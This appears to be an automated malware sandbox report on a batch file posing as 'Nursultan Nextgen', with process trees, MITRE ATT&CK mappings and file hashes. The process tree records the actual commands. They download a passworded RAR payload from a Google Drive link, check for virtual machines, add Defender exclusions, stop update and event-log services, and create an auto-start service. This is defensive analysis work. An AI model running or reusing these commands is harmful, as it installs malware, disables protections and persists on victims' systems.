  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:4496
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3124
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:4636
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:796
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4512
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:508
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4984
- C:\Windows\system32\doskey.exe
  doskey TITLE=RENAME
  2⤵
  PID:1992
- C:\Users\Admin\Desktop\Nursultan Nextgen\assets\UnRAR.exe
  "C:\Users\Admin\Desktop\Nursultan Nextgen\assets\unrar.exe" x -p1512okul -o+ "C:\Users\Admin\AppData\Local\Temp\java.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
  2⤵
  PID:3064
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4688
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 1056
      4⤵
      Program crash
      PID:2428
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:4212
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:3740
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4776
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3568
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4280
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1380
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:648
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1252
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:208
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2244
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:3116
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1032
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "RLNALEWN"
    3⤵
    - Launches sc.exe
    PID:4180
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "RLNALEWN" binpath= "C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:4488
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:4596
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "RLNALEWN"
    3⤵
    - Launches sc.exe
    PID:1460
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:4772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:2200
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:4664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:2140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:2468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:4024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2000
- C:\Windows\system32\rundll32.exe
  rundll32
  2⤵
  PID:2500
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:3612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1432

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat" "
1⤵
PID:2716
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:2764
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4832
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3408
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4512
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:3156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:5060
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:5108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:4804
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:5108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  - Suspicious behavior: EnumeratesProcesses
  PID:640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1324
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:828
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:1560
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4980
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3608
- C:\Windows\system32\wscript.exe
  wscript /b
  2⤵
  PID:4448
- C:\Windows\system32\timeout.exe
  timeout 0
  2⤵
  - Delays execution with timeout.exe
  PID:3740
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:4660
- C:\Windows\system32\doskey.exe
  doskey CD=RECOVER
  2⤵
  PID:4268
- C:\Windows\system32\doskey.exe
  doskey TYPE=ROBOCOPY
  2⤵
  PID:4068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://drive.usercontent.google.com/u/0/uc?id=1uH0vQ_juAop0fqiOEIdPBdq1AMQmvndT&export=download', 'C:\Users\Admin\AppData\Local\Temp\java.rar')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:1804
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:2012
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  PID:4184
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:5056
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:2300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:5040
- C:\Windows\system32\findstr.exe
  findstr /i "echo" "C:\Users\Admin\Desktop\Nursultan Nextgen\start.bat"
  2⤵
  PID:1648
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if ((Get-WmiObject Win32_ComputerSystem).Model -match 'Virtual') { taskkill /F /IM cmd.exe }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2508
- C:\Windows\system32\doskey.exe
  doskey TITLE=RENAME
  2⤵
  PID:224
- C:\Users\Admin\Desktop\Nursultan Nextgen\assets\UnRAR.exe
  "C:\Users\Admin\Desktop\Nursultan Nextgen\assets\unrar.exe" x -p1512okul -o+ "C:\Users\Admin\AppData\Local\Temp\java.rar" "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF"
  2⤵
  PID:4060
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\optionsof.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  PID:1636
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1576
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1576 -s 1052
      4⤵
      Program crash
      PID:4748
- C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe
  "C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\java8-update.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:648
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2188
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4596
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1648
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2052
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:704
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:5100
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:556
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:4804
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1336
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:4172
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:2676
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "RLNALEWN"
    3⤵
    - Launches sc.exe
    PID:2428
- C:\Windows\system32\mshta.exe
  mshta
  2⤵
  PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:3808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  PID:4296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoLogo -NoProfile -ExecutionPolicy Bypass -Command "if((gcim Win32_PhysicalMemory | measure -Property capacity -Sum).sum /1gb -lt 4) {spps -f -n 'cmd' -ErrorAction SilentlyContinue;exit 1}"
  2⤵
  - Hide Artifacts: Ignore Process Interrupts
  PID:2712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value
  2⤵
  PID:1400
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get manufacturer /value
    3⤵
    PID:3440
- C:\Windows\system32\rundll32.exe
  rundll32
  2⤵
  PID:1760
- C:\Windows\system32\timeout.exe
  timeout /T 10 /NOBREAK
  2⤵
  - Delays execution with timeout.exe
  PID:4564
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -c "Write-Host -NoNewLine $null"
  2⤵
  PID:4744

C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:2948
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4212
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5020
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1804
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:3460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2424
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1268
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2400
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2632
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3224
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:4688
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:224
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3576
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:2092

C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
C:\ProgramData\htsdqitpnkda\zrgqfbcavrkx.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:4224
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1752
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4212
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2188
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4468
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4988
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:3460
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1528
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:316
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:3064
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1928
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:2020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Ignore Process Interrupts

T1564.011

Impair Defenses

T1562

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
128b5c395d2956830809b9b9e5c65b5e

SHA1
34603e22e3daf2379fd6f15c0af9980757ffd97c

SHA256
7e5984cbfd4e429dc8c98159d0f65c514e8e4ab09fb39280999bcce59cc5a93f

SHA512
749f11e940d35e17af95d336a6accf88e5a69cd73b028ed23dbae07f38de30b748a324c6e390b1d87abac03df530a992d04879de079f5323fb78de61fb8ee9d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a0591555b23f60c85f752ec7c27ed1cf

SHA1
e547dff062fcec2e3a778bb5a14441c2f6061825

SHA256
effbba1fbc5e884ec7a60fa686b629448951cf901f95fc4eb8857617bf96fbed

SHA512
8c7a5e99ed75d244427ab3538c73eafb71222022b7ee31ec0f5825ae6b7347434d80a72f04e08d0499d9ac1582faddc60b57be547a33377909f87fbaee69354e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03b93ca6b4cd8468d5fd850eadfd96a1

SHA1
361e048bda8f19be0c771dee22baa0fd5d5fa549

SHA256
9c5001c706b1032e880b83b520c3c8695a76416e6b632d831ce0762dde6b0e98

SHA512
6625a4c788177ae43c63f31d8a2d654ee3c8e4e925427cb35608516935dbfdaf53b183ba9651128c36f0b9ed212a0c48ed2c2e9efe5bd0ab3a029711ce7d05ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97ff4917972bfb50c64e0122eb1a087b

SHA1
d9d58c92dae2da723b1a035a93b75a416f985dd4

SHA256
586da8f8770c01a2741aa99497b9d8dc22b1d365d786549fe91abc08d6f5cd7a

SHA512
7019a52694b341b2ed1b1be7211cecd882f3a77b865efe224bc8472d5f36ad95555c6154dad689999a42f4a6f587129c3285385ab5ad18ce858cd7bf40877756

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abde4a3def63d6a2890a8d88161b4394

SHA1
0ed35bc606eb3448cafec24fad6c4376149a43c6

SHA256
51605a209e6e5cfdfc1fc31572e71039f2db6db7a89e846734d288f2add2f0dd

SHA512
970be60c08857015c5f1eea7ad29334cd550fc2095afcbfbb34e647c1f57949c4a6377eca30662e172f4af993395299368fff7dd2e472d0485a0c7442e64fb16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5fb5a5f70484eb8abfecd3b9e9f080dc

SHA1
90707c90f1b3ea6112e31d46f5ab2292eb1ebac4

SHA256
7af7be4aa3d663b9801a6368bae1cb33ea49088b6be69fdd7ba0553356455cf4

SHA512
e8f60d49d064bad2fb5ce80405908e16fa77a9ba440ef6d3faea2754d62675b24b6dac7457b863b079e80abe95894b88e05199b5e4ad683c749dfbe101311ec2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
70cdd1a019c28f3fbc1e87464b7d6cec

SHA1
ccd377b8da7a6794c6de9737812a0172e6f1cfc3

SHA256
f749b78d8a6bd465597a997fdb97817e20a4fae72bbc06abc3cbca83241643fe

SHA512
c9fe3991fd30ad498662c336a5ec13d0ce771b742854dc83ef35004ad47ee377288e4e2bb298fe71f2ab44a47cf66a4833331573d0c27a2bd3e99837de2ea15b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
198a22caf8861f0c550fb63c2e191912

SHA1
febf361a164b866c782a49010fe929f89abc94ad

SHA256
ab5990be97483518519fed1d3ec661c9362e38b6c2e0772afffc609a82c11931

SHA512
e890d0ba4d14a78af3b5331094cce857e1933ffa20734d48ab2375fba7bd5a28623cb367cd8ae81331ed715f6e512c3302bef750458f9adb91d30020eab15e73

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
04b27d1ab5909fbe2b0c1f4f0af2366a

SHA1
359da14e165be4561de2e4270a5dcfe4b73e8887

SHA256
d2ca1484a111a4da72ce71a2a6c812fb09cfc7eea087a77218160c35761434ed

SHA512
c71ddce35af41dd3dd88c44d12a4e3616f37507fd2feb42eaaf372b4cab677e9fc158efcf6b0fdebb95438390ed7bb5f2c6770b2af839b4780a5e10595a7bb13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9a20ab5f11060c2bdd5bbe34790309dc

SHA1
6833cc831074feb96c7eb901e880a84857182abf

SHA256
a44424cdf55b3d041c9eed7e97d0cdb781f113f84b84bae9a5c0883ad93fc974

SHA512
48c61d24aeaaa8ec112be19f82669f493e95b85f027d82d0a07741f76feb2f2ecddbdcaecc9ce35574e7d740ff7783806610e7954f05d2d990f342cfe7383946

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b2f6be46cb368d96381cb47ec9bfc457

SHA1
6ba4b4ba4886eab981f912940e2e9c9afbc2ec21

